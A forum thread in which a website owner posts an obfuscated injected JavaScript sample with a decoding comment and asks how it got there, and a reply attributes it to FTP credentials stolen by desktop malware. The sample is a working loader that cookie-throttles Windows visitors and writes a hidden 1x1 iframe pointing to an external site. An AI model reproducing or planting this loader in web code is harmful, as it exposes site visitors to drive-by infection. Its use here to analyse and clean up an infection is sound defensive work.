matlos
matlos


Where does this JavaScript malware come from?

I found this code in some .js files on my website.

/*
 * Injected, obfuscated script, kept exactly as it was found on the site.
 *
 * _0x3ba2 is a string table of hex-escaped literals; every property name and
 * constant in the code is looked up in it by index. Decoded entries:
 *   [0] "="   [1] ""   [2] "length"   [3] "cookie"   [4] "indexOf"   [5] ";"
 *   [6] "substring"   [7] "stoped"   [8] "platform"   [9] "Win32"
 *   [10] "appName"   [11] "Microsoft Internet Explorer"   [12] "Netscape"
 *   [13] "432000 hours"   [14] "getHours"   [15] "setHours"   [16] "stoped="
 *   [17] ";path=/;expires="   [18] "toGMTString"   [20] "write"
 *   [19] a <div name="youtube"> wrapping a 1x1, borderless <iframe> whose src
 *        is hxxp://www.mantra-stone[.]de/contact.php (defanged in this note).
 *
 * get_cookie(name): searches document.cookie for "name=" and returns the
 * unescape()d value up to the next ";" (or the end of the string); returns ""
 * when the cookie is absent. `offset` and `end` are assigned without a
 * declaration, so they become implicit globals on the page.
 *
 * Top-level statement: runs only when the "stoped" cookie is empty AND
 * navigator.platform == "Win32" AND navigator.appName is "Microsoft Internet
 * Explorer" or "Netscape". It then
 *   1. sets cookie stoped=432000 with path=/ and an expiry of now + 432000
 *      hours (parseInt("432000 hours") yields 432000, roughly 49 years), and
 *   2. document.write()s entry [19], i.e. the 1x1 iframe, into the page.
 * The cookie acts as a once-per-browser throttle: a visitor who already has
 * it is skipped, which also hides the iframe from repeat checks made in the
 * same browser.
 *
 * NOTE(review): "Netscape" is the appName most non-IE browsers report, so the
 * filter presumably amounts to "any Windows browser"; what the framed page
 * serves is not visible from this sample.
 *
 * For cleanup, search every .js file on the server for the table name
 * `_0x3ba2`, the cookie name in its escaped form, or the hex-escaped iframe
 * markup; the decoded strings do not appear literally in the infected files.
 */
var _0x3ba2=["\x3D","","\x6C\x65\x6E\x67\x74\x68","\x63\x6F\x6F\x6B\x69\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x3B","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x73\x74\x6F\x70\x65\x64","\x70\x6C\x61\x74\x66\x6F\x72\x6D","\x57\x69\x6E\x33\x32","\x61\x70\x70\x4E\x61\x6D\x65","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x49\x6E\x74\x65\x72\x6E\x65\x74\x20\x45\x78\x70\x6C\x6F\x72\x65\x72","\x4E\x65\x74\x73\x63\x61\x70\x65","\x34\x33\x32\x30\x30\x30\x20\x68\x6F\x75\x72\x73","\x67\x65\x74\x48\x6F\x75\x72\x73","\x73\x65\x74\x48\x6F\x75\x72\x73","\x73\x74\x6F\x70\x65\x64\x3D","\x3B\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x3C\x64\x69\x76\x20\x6E\x61\x6D\x65\x3D\x22\x79\x6F\x75\x74\x75\x62\x65\x22\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x61\x6E\x74\x72\x61\x2D\x73\x74\x6F\x6E\x65\x2E\x64\x65\x2F\x63\x6F\x6E\x74\x61\x63\x74\x2E\x70\x68\x70\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x61\x6C\x6C\x6F\x77\x66\x75\x6C\x6C\x73\x63\x72\x65\x65\x6E\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x77\x72\x69\x74\x65"];function get_cookie(_0x2c9dx2){var _0x2c9dx3=_0x2c9dx2+_0x3ba2[0];var _0x2c9dx4=_0x3ba2[1];if(document[_0x3ba2[3]][_0x3ba2[2]]>0){offset=document[_0x3ba2[3]][_0x3ba2[4]](_0x2c9dx3);if(offset!=-1){offset+=_0x2c9dx3[_0x3ba2[2]];end=document[_0x3ba2[3]][_0x3ba2[4]](_0x3ba2[5],offset);if(end==-1){end=document[_0x3ba2[3]][_0x3ba2[2]];} ;_0x2c9dx4=unescape(document[_0x3ba2[3]][_0x3ba2[6]](offset,end));} ;} ;return _0x2c9dx4;} ;if(get_cookie(_0x3ba2[7])==_0x3ba2[1]&&navigator[_0x3ba2[8]]==_0x3ba2[9]){if(navigator[_0x3ba2[10]]==_0x3ba2[11]||navigator[_0x3ba2[10]]==_0x3ba2[12]){var popfrequency=_0x3ba2[13];var expireDate= new 
Date();expireDate[_0x3ba2[15]](expireDate[_0x3ba2[14]]()+parseInt(popfrequency));document[_0x3ba2[3]]=_0x3ba2[16]+parseInt(popfrequency)+_0x3ba2[17]+expireDate[_0x3ba2[18]]();document[_0x3ba2[20]](_0x3ba2[19]);} ;} ;

I cannot explain where it came from. Is the only explanation that my FTP login leaked? Has anyone run into this? My website was banned as an offensive site because of this.


Answers (1)

Cosmin
Cosmin


I had a similar problem with injected JS code.

I had malware on my computer, and after I connected to the FTP server with FileZilla, some JS code was injected, which opened a hidden iframe in the visitor's browser. This iframe infected the visitor's computer when they entered the site.

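Run a virus/malware cleanup on your computer and make sure you don't get infected again. Also remove the injected code from every affected .js file on the server, or restore those files from a known-clean backup, because cleaning the computer does not clean the site.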

With this code on your site, you will probably infect visitors who enter your site.

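Fortunately, your password was probably not leaked; this kind of JS injection is an automated process. Still, I strongly recommend that you change the password from another, clean computer, because malware on the infected machine may have been able to read credentials saved in the FTP client.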
